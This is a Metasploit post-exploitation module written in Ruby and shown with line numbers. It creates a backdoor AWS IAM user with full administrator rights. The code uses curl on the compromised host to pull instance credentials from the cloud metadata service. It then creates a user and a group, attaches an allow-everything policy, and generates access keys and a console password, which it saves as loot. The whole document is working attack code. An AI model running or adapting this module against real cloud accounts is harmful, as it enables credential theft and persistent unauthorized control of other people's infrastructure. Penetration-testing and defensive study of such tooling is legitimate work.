Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'metasploit/framework/aws/client'
7
require 'json'
8

9
class MetasploitModule < Msf::Post
10
  include Metasploit::Framework::Aws::Client
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'Create an AWS IAM User',
17
        'Description' => %q{
18
          This module will attempt to create an AWS (Amazon Web Services) IAM
19
          (Identity and Access Management) user with Admin privileges.
20
        },
21
        'License' => MSF_LICENSE,
22
        'Platform' => %w[unix],
23
        'SessionTypes' => %w[shell meterpreter],
24
        'Author' => [
25
          'Javier Godinez <godinezj[at]gmail.com>',
26
          'Jon Hart <[email protected]>'
27
        ],
28
        'References' => [
29
          [ 'URL', 'https://github.com/devsecops/bootcamp/raw/master/Week-6/slides/june-DSO-bootcamp-week-six-lesson-three.pdf' ]
30
        ]
31
      )
32
    )
33

34
    register_options(
35
      [
36
        OptString.new('IAM_USERNAME', [false, 'Name of the user to be created (leave empty or unset to use a random name)', '']),
37
        OptString.new('IAM_PASSWORD', [false, 'Password to set for the user to be created (leave empty or unset to use a random name)', '']),
38
        OptString.new('IAM_GROUPNAME', [false, 'Name of the group to be created (leave empty or unset to use a random name)', '']),
39
        OptBool.new('CREATE_API', [true, 'Add access key ID and secret access key to account (API, CLI, and SDK access)', true]),
40
        OptBool.new('CREATE_CONSOLE', [true, 'Create an account with a password for accessing the AWS management console', true]),
41
        OptString.new('AccessKeyId', [false, 'AWS access key', '']),
42
        OptString.new('SecretAccessKey', [false, 'AWS secret key', '']),
43
        OptString.new('Token', [false, 'AWS session token', ''])
44
      ]
45
    )
46
    register_advanced_options(
47
      [
48
        OptString.new('METADATA_IP', [true, 'The metadata service IP', '169.254.169.254']),
49
        OptString.new('RHOST', [true, 'AWS IAM Endpoint', 'iam.amazonaws.com']),
50
        OptPort.new('RPORT', [true, 'AWS IAM Endpoint TCP Port', 443]),
51
        OptString.new('SSL', [true, 'AWS IAM Endpoint SSL', true]),
52
        OptString.new('IAM_GROUP_POL', [true, 'IAM group policy to use', '{"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*" }]}']),
53
        OptString.new('Region', [true, 'The default region', 'us-east-1' ])
54
      ]
55
    )
56
    deregister_options('VHOST')
57
  end
58

59
  def setup
60
    if !(datastore['CREATE_API'] || datastore['CREATE_CONSOLE'])
61
      fail_with(Failure::BadConfig, 'Must set one or both of CREATE_API and CREATE_CONSOLE')
62
    end
63
  end
64

65
  def run
66
    # setup creds for making IAM API calls
67
    creds = metadata_creds
68
    if datastore['AccessKeyId'].empty?
69
      unless creds.include?('AccessKeyId')
70
        print_error('Could not find creds')
71
        return
72
      end
73
    else
74
      creds = {
75
        'AccessKeyId' => datastore['AccessKeyId'],
76
        'SecretAccessKey' => datastore['SecretAccessKey']
77
      }
78
      creds['Token'] = datastore['Token'] unless datastore['Token'].blank?
79
    end
80

81
    results = {}
82

83
    # create user
84
    username = datastore['IAM_USERNAME'].blank? ? Rex::Text.rand_text_alphanumeric(16) : datastore['IAM_USERNAME']
85
    print_status("Creating user: #{username}")
86
    action = 'CreateUser'
87
    doc = call_iam(creds, 'Action' => action, 'UserName' => username)
88
    print_results(doc, action)
89
    results['UserName'] = username
90

91
    # create group
92
    groupname = datastore['IAM_GROUPNAME'].blank? ? username : datastore['IAM_GROUPNAME']
93
    print_status("Creating group: #{groupname}")
94
    action = 'CreateGroup'
95
    doc = call_iam(creds, 'Action' => action, 'GroupName' => groupname)
96
    print_results(doc, action)
97
    results['GroupName'] = groupname
98

99
    # create group policy
100
    print_status('Creating group policy')
101
    pol_doc = datastore['IAM_GROUP_POL']
102
    action = 'PutGroupPolicy'
103
    doc = call_iam(creds, 'Action' => action, 'GroupName' => groupname, 'PolicyName' => 'Policy', 'PolicyDocument' => URI::DEFAULT_PARSER.escape(pol_doc))
104
    print_results(doc, action)
105

106
    # add user to group
107
    print_status("Adding user (#{username}) to group: #{groupname}")
108
    action = 'AddUserToGroup'
109
    doc = call_iam(creds, 'Action' => action, 'UserName' => username, 'GroupName' => groupname)
110
    print_results(doc, action)
111

112
    if datastore['CREATE_API']
113
      # create API keys
114
      print_status("Creating API Keys for #{username}")
115
      action = 'CreateAccessKey'
116
      response = call_iam(creds, 'Action' => action, 'UserName' => username)
117
      doc = print_results(response, action)
118
      if doc
119
        results['SecretAccessKey'] = doc['SecretAccessKey']
120
        results['AccessKeyId'] = doc['AccessKeyId']
121
      end
122
    end
123

124
    if datastore['CREATE_CONSOLE']
125
      print_status("Creating password for #{username}")
126
      password = datastore['IAM_PASSWORD'].blank? ? Rex::Text.rand_text_alphanumeric(16) : datastore['IAM_PASSWORD']
127
      action = 'CreateLoginProfile'
128
      response = call_iam(creds, 'Action' => action, 'UserName' => username, 'Password' => password)
129
      doc = print_results(response, action)
130
      results['Password'] = password if doc
131
    end
132

133
    action = 'GetUser'
134
    response = call_iam(creds, 'Action' => action, 'UserName' => username)
135
    doc = print_results(response, action)
136
    return if doc.nil?
137

138
    arn = doc['Arn']
139
    results['AccountId'] = arn[/^arn:aws:iam::(\d+):/, 1]
140

141
    keys = results.keys
142
    table = Rex::Text::Table.new(
143
      'Header' => 'AWS Account Information',
144
      'Columns' => keys
145
    )
146
    table << results.values
147
    print_line(table.to_s)
148

149
    if results.key?('AccessKeyId')
150
      print_good('AWS CLI/SDK etc can be accessed by configuring with the above listed values')
151
    end
152

153
    if results.key?('Password')
154
      print_good("AWS console URL https://#{results['AccountId']}.signin.aws.amazon.com/console may be used to access this account")
155
    end
156

157
    path = store_loot('AWS credentials', 'text/plain', session, JSON.pretty_generate(results))
158
    print_good('AWS loot stored at: ' + path)
159
  end
160

161
  def metadata_creds
162
    # TODO: do it for windows/generic way
163
    cmd_out = cmd_exec('curl --version')
164
    if cmd_out =~ /^curl \d/
165
      url = "http://#{datastore['METADATA_IP']}/2012-01-12/meta-data/"
166
      print_status("#{datastore['METADATA_IP']} - looking for creds...")
167
      resp = cmd_exec("curl #{url}")
168
      if resp =~ /^iam.*/
169
        resp = cmd_exec("curl #{url}iam/")
170
        if resp =~ /^security-credentials.*/
171
          resp = cmd_exec("curl #{url}iam/security-credentials/")
172
          json_out = cmd_exec("curl #{url}iam/security-credentials/#{resp}")
173
          begin
174
            return JSON.parse(json_out)
175
          rescue JSON::ParserError
176
            print_error 'Could not parse JSON output'
177
          end
178
        end
179
      end
180
    else
181
      print_error cmd_out
182
    end
183
    {}
184
  end
185
end
186

187